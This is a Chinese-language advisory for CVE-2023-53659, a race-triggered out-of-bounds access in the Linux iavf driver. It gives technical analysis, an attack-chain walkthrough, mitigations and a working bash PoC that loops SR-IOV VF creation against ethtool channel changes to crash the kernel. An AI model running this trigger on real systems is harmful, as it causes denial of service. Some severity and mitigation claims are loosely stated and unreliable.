CVE-2023-53659：Linux内核iavf驱动移除时越界访问漏洞

漏洞信息

漏洞编号

CVE-2023-53659

漏洞类型

越界访问（Out-of-Bounds）

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 iavf驱动（Intel Adaptive Virtual Function）

漏洞概述

CVE-2023-53659是Linux内核iavf（Intel Adaptive Virtual Function）驱动中存在的一个高危越界访问漏洞。该漏洞源于iavf_remove()函数中处理通道数（channels）设置的逻辑缺陷。当在设备移除过程中设置较大的通道数时，如果等待重置完成（reset done）超时，函数会返回错误，但在此之前已经直接修改了num_active_queues的值。由于num_active_queues的值大于实际分配的tx/rx_rings[]数组大小，后续调用iavf_free_all_tx_resources()等函数时会触发KASAN检测到的slab-out-of-bounds错误，导致内核崩溃。该漏洞需要本地低权限访问，但可造成高机密性影响和高可用性影响，攻击者可利用此漏洞导致系统拒绝服务或读取超出边界的内存数据。漏洞通过SR-IOV虚拟功能的创建/销毁与ethtool通道数设置的并发操作触发，属于典型的竞态条件导致的内存安全问题。

技术细节

该漏洞的技术原理如下：iavf驱动在iavf_remove()函数中处理通道数变更请求时，会先修改adapter->num_active_queues的值，然后等待硬件重置完成（wait_for_reset）。如果在等待过程中超时，函数会返回错误码，但此时num_active_queues已经被修改为较大的值，而对应的tx_rings[]和rx_rings[]数组并未按新值重新分配。当后续调用iavf_free_all_tx_resources()或iavf_free_all_rx_resources()遍历这些数组时，会访问超出实际分配范围的内存区域，触发KASAN的slab-out-of-bounds检测。

漏洞的触发需要以下竞态条件：1）通过sysfs接口（sriov_numvfs）频繁创建和销毁SR-IOV虚拟功能；2）同时通过ethtool工具（ethtool -L）修改VF的通道数；3）当VF设备正在被移除时执行通道数变更操作。攻击者可通过精心设计的并发操作序列，使iavf_remove()在错误的状态下修改num_active_queues，从而触发越界访问。修复方案是在修改num_active_queues之前检查重置状态，或在超时后回滚num_active_queues的修改，确保数据一致性。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要具有本地低权限访问权限，并拥有支持SR-IOV的Intel网卡硬件（如i40e驱动管理的PF设备）。需要加载iavf驱动并创建至少一个VF。

STEP 2

步骤2：并发操作触发竞态

攻击者同时启动两个进程：一个进程通过sysfs接口（sriov_numvfs）频繁创建和销毁SR-IOV虚拟功能，另一个进程通过ethtool工具修改VF的通道数（combined 1和combined 4交替设置）。

STEP 3

步骤3：触发越界访问

当VF设备正在被移除（iavf_remove()执行）时，如果ethtool的通道数设置请求恰好到达，iavf_remove()会先修改num_active_queues为较大值，然后等待重置完成超时后返回错误。

STEP 4

步骤4：内核崩溃或信息泄露

由于num_active_queues大于实际分配的tx/rx_rings[]数组大小，后续调用iavf_free_all_tx_resources()遍历数组时触发KASAN slab-out-of-bounds错误，导致内核崩溃或读取超出边界的内存数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2023-53659 PoC - Trigger OOB in iavf driver
# This script triggers the race condition between SR-IOV VF
# creation/destruction and ethtool channel setting

pf_dbsf="0000:41:00.0"
vf0_dbsf="0000:41:02.0"
g_pids=()

function do_set_numvf()
{
    # Continuously create and destroy SR-IOV VFs
    echo 2 >/sys/bus/pci/devices/${pf_dbsf}/sriov_numvfs
    sleep $((RANDOM%3+1))
    echo 0 >/sys/bus/pci/devices/${pf_dbsf}/sriov_numvfs
    sleep $((RANDOM%3+1))
}

function do_set_channel()
{
    # Continuously change the number of channels on the VF
    local nic=$(ls -1 --indicator-style=none /sys/bus/pci/devices/${vf0_dbsf}/net/)
    [ -z "$nic" ] && { sleep $((RANDOM%3)) ; return 1; }
    ifconfig $nic 192.168.18.5 netmask 255.255.255.0
    ifconfig $nic up
    ethtool -L $nic combined 1
    ethtool -L $nic combined 4
    sleep $((RANDOM%3))
}

function on_exit()
{
    local pid
    for pid in "${g_pids[@]}"; do
        kill -0 "$pid" &>/dev/null && kill "$pid" &>/dev/null
    done
    g_pids=()
}

trap "on_exit; exit" EXIT

# Run both operations concurrently to trigger race condition
while :; do do_set_numvf ; done &
g_pids+=($!)
while :; do do_set_channel ; done &
g_pids+=($!)

wait

影响范围

Linux内核 iavf驱动（影响多个稳定版本，具体取决于发行版内核版本）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果不需要SR-IOV功能，可在BIOS中禁用SR-IOV或在系统中通过内核参数iommu=off和禁用iavf模块（rmmod iavf或blacklist iavf）来缓解；2）限制普通用户对ethtool工具和sysfs中PCI设备相关文件的访问权限，避免未授权用户触发竞态条件；3）监控内核日志（dmesg）中的KASAN相关警告，及时发现异常；4）避免在高负载或频繁VF创建/销毁的环境中修改通道数。